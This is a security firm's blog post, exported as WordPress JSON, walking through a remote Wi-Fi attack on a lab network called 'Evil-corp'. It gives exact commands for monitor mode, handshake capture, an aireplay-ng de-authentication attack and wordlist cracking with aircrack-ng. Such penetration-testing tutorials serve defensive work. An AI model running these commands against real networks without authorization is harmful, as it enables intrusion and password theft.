{"id":21136,"date":"2024-02-29T17:42:58","date_gmt":"2024-02-29T12:12:58","guid":{"rendered":"https:\/\/www.cigniti.com\/blog\/?p=21136"},"modified":"2024-05-20T15:14:09","modified_gmt":"2024-05-20T09:44:09","slug":"remote-packet-capture-wi-fi-hacking","status":"publish","type":"post","link":"https:\/\/www.cigniti.com\/blog\/remote-packet-capture-wi-fi-hacking\/","title":{"rendered":"Remote Packet Capture: A Deep Dive into Wi-Fi Hacking"},"content":{"rendered":"
As with traditional wired network security, WiFi security is essential to an organization’s setup because it safeguards sensitive data and protects against unauthorized access to critical wireless networks. Hence, it is necessary to perform comprehensive risk assessments and other pertinent checks against the available standards, take note of the threats identified, and address them appropriately.<\/p>\n
WiFi hacking refers to the unauthorized access and manipulation of wireless networks for various purposes, including data theft, network disruption, or gaining unauthorized access to sensitive information. This nefarious activity involves exploiting vulnerabilities in WiFi protocols or network configurations to gain entry, often utilizing specialized tools and techniques. While WiFi hacking can pose significant security risks to individuals and organizations, understanding these techniques is essential for implementing robust cybersecurity defenses and safeguarding against potential threats.<\/p>\n This article explores a method for remotely attacking wireless networks accessible from remote locations. Wi-Fi hacking can be conducted remotely with the aid of the specific tools and techniques detailed in the subsequent sections.<\/p>\n The approach outlined below covers remote attacks on wireless networks through SSH (Secure Shell) services. An essential requirement is that the Alpha card (a device with packet injection capability) must be connected to the remote Kali machine.<\/p>\n Note:- Any device with wireless packet injection enabled can be used.<\/p>\n First, a connection to the remote machine must be established over SSH from the local Kali machine.<\/p>\n Command:- ssh kali@192.168.29.151<\/p>\n Check whether the wireless card is mounted:<\/p>\n Command:- iwconfig<\/p>\n wlan0 \u2013 our wireless card (Alpha card)<\/p>\n Next, other processes that could interfere with the wireless card can be terminated using the following command.<\/p>\n Command:- airmon-ng check kill<\/p>\n To perform packet injection, the wireless card must be switched into monitor mode.<\/p>\n Command:- airmon-ng start wlan0<\/p>\n Monitor mode has been successfully enabled on the wireless card.<\/p>\n The additional details (such as BSSID, SSID, Channel Number, Authentication 
Type, Encryption Type, and connected Clients) associated with the target network need to be gathered as follows:<\/p>\n Target network: Evil-corp<\/p>\n The details of the target network have been obtained, as shown in the image below.<\/p>\n In another terminal window:<\/p>\n Remote listening using Wireshark needs to be initiated with the assistance of tcpdump to capture the remote wireless traffic.<\/p>\n tcpdump is executed on the wireless interface of the remote machine, and the captured traffic is redirected to the local machine using the command below. Essentially, the output of tcpdump is piped into Wireshark.<\/p>\n Command:- 192.168.29.151 \u2013 remote Kali IP<\/p>\n Wireshark will open after executing the above command, but the traffic might not be immediately observed.<\/p>\n The password of the remote machine needs to be entered, as shown below.<\/p>\n After entering the password, the traffic flow originating from the wireless card interface of the remote Kali machine will be observed as follows.<\/p>\n The target details are now used to perform an attack on the target network as follows:<\/p>\n Command:- airodump-ng --bssid C4:E9:0A:5B:CD:4D -c 9 -w test wlan0mon<\/p>\n C4:E9:0A:5B:CD:4D \u2013 target BSSID<\/p>\n 9 \u2013 the target network is running on channel 9<\/p>\n test \u2013 the captured file is saved under the name test.<\/p>\n The attack on the target network has been launched successfully.<\/p>\n The client device connecting to the target AP can be observed as follows:<\/p>\n Open a new terminal and connect to the remote machine.<\/p>\n The de-authentication attack needs to be executed to capture the handshake.<\/p>\n The aireplay-ng tool is used to execute the de-authentication attack.<\/p>\n Command:- 
aireplay-ng -0 1 -a C4:E9:0A:5B:CD:4D -c 3E:E7:79:AF:C5:A9 wlan0mon<\/p>\n C4:E9:0A:5B:CD:4D \u2013 the target AP BSSID<\/p>\n 3E:E7:79:AF:C5:A9 \u2013 the MAC address of the target AP client<\/p>\n -0 \u2013 sets aireplay-ng to perform a de-auth attack<\/p>\n 1 \u2013 number of de-auth packets<\/p>\n The de-authentication attack is repeated at regular intervals of 15 seconds until the \u201cWPA handshake\u201d is captured.<\/p>\n The successful capture of the WPA handshake is as follows:<\/p>\n The process needs to be terminated by pressing Ctrl+C.<\/p>\n Navigate to Wireshark and stop the capture by clicking the STOP button (the red button). The captured data needs to be saved to proceed with the password cracking.<\/p>\n From the Wireshark dashboard, click File > Save As and save the file with the .pcap extension.<\/p>\n The captured file was saved as \u201cevilcorp.pcap\u201d.<\/p>\n The .pcap file type is a supported format for the aircrack-ng tool.<\/p>\n To crack the password of the target network, the aircrack-ng tool is used. Password cracking is started by executing the following command:<\/p>\n Command:- \/usr\/share\/john\/password.lst \u2013 the wordlist used for cracking the password<\/p>\n C4:E9:0A:5B:CD:4D \u2013 target network BSSID<\/p>\n evilcorp.pcap \u2013 the file containing the captured WPA handshake<\/p>\n After executing the command, there is some wait time for the password-cracking process to complete.<\/p>\n The password has been successfully cracked. The password for the target network is “password”.<\/p>\n Note:- Sometimes, default wordlists may not be sufficient for cracking passwords. 
In such cases, custom wordlists can be used or generated using tools like Crunch and John the Ripper.<\/p>\n To crack the password using hashcat with the assistance of a GPU, the .pcap file needs to be converted to a format supported by hashcat.<\/p>\n Cigniti offers a wide variety of services with regards to wireless security through a wide range of initiatives, including assessments and other activities, and provides the necessary support to corporates and other clients to improve the overall security posture and ensure robust networks are in place, which makes the network infrastructure immune to various attack vectors, which are constantly evolving. Enhancements in testing strategy adapted to detect new attack patterns and methods and remediation measures are also suggested in the path of continuous improvement.<\/p>\n Need help? Schedule a call with our Security Testing experts to learn about Wi-Fi hacking using remote packet capture.<\/p>\n","protected":false},"excerpt":{"rendered":" As with traditional wired networks and security, WiFi security is also essential to the organization’s setup as it safeguards sensitive data and protects unauthorized access in most critical wireless networks. 
Hence, it is necessary to perform comprehensive risk assessments and various other pertinent checks concerning the available standards, make note of multiple threats, and amicably […]<\/p>\n","protected":false},"author":20,"featured_media":21137,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[5474,5467,5476,5477,1298,5471,5473,5465,498,5470,5469,5466,5468,5475,5472],"ppma_author":[5464],"class_list":["post-21136","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security-testing","tag-aircrack-ng","tag-cybersecurity-defense","tag-de-authentication-attack","tag-hashcat","tag-network-security","tag-packet-injection","tag-password-cracking","tag-remote-packet-capture","tag-security-testing","tag-ssh-services","tag-vulnerability-exploitation","tag-wi-fi-hacking","tag-wireless-networks","tag-wireshark-analysis","tag-wpa-handshake-capture"],"authors":[{"term_id":5464,"user_id":0,"is_guest":1,"slug":"venkata-harish-bathula","display_name":"Venkata Harish Bathula","avatar_url":{"url":"https:\/\/www.cigniti.com\/blog\/wp-content\/uploads\/2024\/02\/Venkata-Harish-Bathula.jpeg","url2x":"https:\/\/www.cigniti.com\/blog\/wp-content\/uploads\/2024\/02\/Venkata-Harish-Bathula.jpeg"},"user_url":"https:\/\/www.cigniti.com\/blog\/","last_name":"Bathula","first_name":"Venkata Harish","job_title":"","description":"Harish has over 5 years of hands-on experience in cybersecurity assessments, covering DAST, MAST, SAST, NPT, and API evaluations, along with expertise in finetuning various commercial and opensource tools and custom configuration to achieve speed and quality on par and as per the business requirements. 
Currently serving as a Senior Security Researcher at Cigniti Technologies, is a passionate technology blogger with Wi-Fi and other cybersecurity certifications."}],"_links":{"self":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/posts\/21136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/users\/20"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/comments?post=21136"}],"version-history":[{"count":0,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/posts\/21136\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/media\/21137"}],"wp:attachment":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/media?parent=21136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/categories?post=21136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/tags?post=21136"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/ppma_author?post=21136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}Tools:-<\/h3>\n
Requirements:<\/h3>\n
sudo ssh kali@192.168.29.151 "sudo -S tcpdump -U -w - -i wlan0mon" | wireshark -k -i -<\/p>\n
sudo aircrack-ng -w \/usr\/share\/john\/password.lst --bssid C4:E9:0A:5B:CD:4D evilcorp.pcap<\/p>\n
Conclusion<\/h3>\n